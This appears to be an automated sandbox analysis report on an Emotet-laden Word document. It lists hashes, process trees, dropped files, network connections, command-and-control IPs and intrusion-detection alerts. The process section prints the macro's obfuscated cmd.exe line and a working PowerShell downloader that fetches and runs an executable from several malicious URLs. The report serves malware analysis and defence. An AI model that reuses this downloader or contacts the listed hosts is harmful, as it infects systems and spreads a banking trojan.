analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE35 1422 6107 5661 3014 96.doc

Full analysis: https://app.any.run/tasks/8962dafe-d102-41fc-ab8e-8c81c9c0b740
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 18, 2018, 10:19:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
trojan
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:36:00 2018, Last Saved Time/Date: Tue Dec 18 07:36:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0
MD5:

90BABAFC6C67C4CB0C7007A9BB19E783

SHA1:

4236C23448B94A4519BC765F0642D515B7EBC96D

SHA256:

B8A7A5DA8C978F8440141BCC14BCD4F393CB92F6C6C48CCE52A03EF7C180AF33

SSDEEP:

1536:FL4w1LD4fbKghmXB5luOUom8uW41LIpiXievnH+a9:Fcw13eKQOUo101O+iev

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3524)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3524)
    • Application was dropped or rewritten from another process

      • 995.exe (PID: 3188)
      • 995.exe (PID: 2236)
      • archivesymbol.exe (PID: 3416)
      • archivesymbol.exe (PID: 2824)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3132)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2968)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2968)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3416)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3416)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3416)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 2572)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2572)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2968)
      • 995.exe (PID: 3188)
    • Creates files in the user directory

      • powershell.exe (PID: 2968)
    • Starts itself from another location

      • 995.exe (PID: 3188)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3416)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 07:36:00
ModifyDate: 2018:12:18 07:36:00
Pages: 1
Words: 5
Characters: 33
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 37
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 995.exe no specs 995.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE35 1422 6107 5661 3014 96.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2572c:\sVwCiOzTWNiPm\WzCkFlcVSW\VlBsmipsbU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3132CmD /V/C"set W6XZ=;'jcW'=Fjo$}}{hctac}};kaerb;'TLz'=lbz$;SEc$ metI-ekovnI{ )00008 eg- htgnel.)SEc$ metI-teG(( fI;'qpt'=whj$;)SEc$ ,NFz$(eliFdaolnwoD.ztL${yrt{)qjP$ ni NFz$(hcaerof;'exe.'+WCk$+'\'+pmet:vne$=SEc$;'SKz'=Tcu$;'599' = WCk$;'lvI'=brk$;)'@'(tilpS.'Of3mJi1/moc.gepohsknip.www//:ptth@0vb6pEI/gro.laiafamafa.www//:ptth@8IIXV32/gro.amhcim//:ptth@fURWISRxU8/moc.secivresretupmocaesnaws.www//:ptth@0NgwrKGs2Y/moc.oknecvov-llatsnner.www//:ptth'=qjP$;tneilCbeW.teN tcejbo-wen=ztL$;'rvj'=tZz$ llehsrewop&&for /L %X in (485,-1,0)do set Pjv=!Pjv!!W6XZ:~%X,1!&&if %X leq 0 call %Pjv:*Pjv!=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2968powershell $zZt='jvr';$Ltz=new-object Net.WebClient;$Pjq='http://www.rennstall-vovcenko.com/Y2sGKrwgN0@http://www.swanseacomputerservices.com/8UxRSIWRUf@http://michma.org/23VXII8@http://www.afamafaial.org/IEp6bv0@http://www.pinkshopeg.com/1iJm3fO'.Split('@');$krb='Ivl';$kCW = '995';$ucT='zKS';$cES=$env:temp+'\'+$kCW+'.exe';foreach($zFN in $Pjq){try{$Ltz.DownloadFile($zFN, $cES);$jhw='tpq';If ((Get-Item $cES).length -ge 80000) {Invoke-Item $cES;$zbl='zLT';break;}}catch{}}$ojF='Wcj';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2236"C:\Users\admin\AppData\Local\Temp\995.exe" C:\Users\admin\AppData\Local\Temp\995.exepowershell.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3188"C:\Users\admin\AppData\Local\Temp\995.exe"C:\Users\admin\AppData\Local\Temp\995.exe
995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
2824"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe995.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Exit code:
0
Version:
8.00.0.010
3416"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
LEAD Technologies, Inc.
Integrity Level:
MEDIUM
Description:
LEADTOOLS® DLL for Win32
Version:
8.00.0.010
Total events
1 744
Read events
1 255
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
3524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7DC.tmp.cvr
MD5:
SHA256:
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0413772.wmf
MD5:
SHA256:
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A03F850.wmf
MD5:
SHA256:
2968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K2RJRU4MTJEUJC3M4MBJ.temp
MD5:
SHA256:
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AD7A594F018FDD26AF3E78AC20863D96
SHA256:0EBA12D91D07998CCA9BC9C871EDDF0493667173B07061EB40F6D2895B712F85
2968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b866.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3524WINWORD.EXEC:\Users\admin\Desktop\~$AN_DE35 1422 6107 5661 3014 96.docpgc
MD5:DA9D0FCDB679B78EC2C26A1CEAA74BF5
SHA256:DF4F1E029314DE6230F778686FD0C8B2070F3ED97874C057EDBE0518245D5BE1
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59893CCB.wmfwmf
MD5:9104A54FB25B958944C48280953A36C7
SHA256:23185FBD786A277D91E0C9DA34DC511991FDA410414E8A274435B1C8449BE15E
2968powershell.exeC:\Users\admin\AppData\Local\Temp\995.exeexecutable
MD5:0817BB59A9639C0CBA69DFB486957E6A
SHA256:E611B9D95C9E2BFDDAE21D54AA326B0E504D40A1D3D872FB22C8069680576DEB
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:A08219102ECA3D66BD8AD7CC1EAEF5A8
SHA256:2810E9EBA033EFD4C6797C2722A87E7E87BA5D645FC8DC9D60CBE48AB563DC56
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3416
archivesymbol.exe
GET
78.189.21.131:80
http://78.189.21.131/
TR
malicious
2968
powershell.exe
GET
301
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0
SE
html
253 b
malicious
2968
powershell.exe
GET
200
93.90.146.103:80
http://www.rennstall-vovcenko.com/Y2sGKrwgN0/
SE
executable
124 Kb
malicious
3416
archivesymbol.exe
GET
187.140.90.91:8080
http://187.140.90.91:8080/
MX
malicious
3416
archivesymbol.exe
GET
200
81.150.17.158:50000
http://81.150.17.158:50000/
GB
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2968
powershell.exe
93.90.146.103:80
www.rennstall-vovcenko.com
Levonline AB
SE
suspicious
3416
archivesymbol.exe
78.189.21.131:80
Turk Telekom
TR
malicious
3416
archivesymbol.exe
187.140.90.91:8080
Uninet S.A. de C.V.
MX
malicious
3416
archivesymbol.exe
213.120.119.231:8443
British Telecommunications PLC
GB
malicious
3416
archivesymbol.exe
81.150.17.158:50000
British Telecommunications PLC
GB
malicious

DNS requests

Domain
IP
Reputation
www.rennstall-vovcenko.com
  • 93.90.146.103
malicious

Threats

PID
Process
Class
Message
2968
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2968
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2968
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2968
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2968
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3416
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3416
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3416
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3416
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3416
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3 ETPRO signatures available at the full report
No debug info